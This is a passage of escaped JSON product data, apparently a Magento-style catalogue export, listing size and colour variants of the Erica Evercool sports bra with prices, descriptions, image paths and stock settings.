Bra-S-Blue\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1562\":{\"sku\":\"WB02-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-S-Orange\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1563\":{\"sku\":\"WB02-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-S-Yellow\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1564\":{\"sku\":\"WB02-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-M-Blue\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1565\":{\"sku\":\"WB02-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-M-Orange\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1566\":{\"sku\":\"WB02-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-M-Yellow\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1567\":{\"sku\":\"WB02-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-L-Blue\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1568\":{\"sku\":\"WB02-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-L-Orange\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1569\":{\"sku\":\"WB02-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-L-Yellow\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\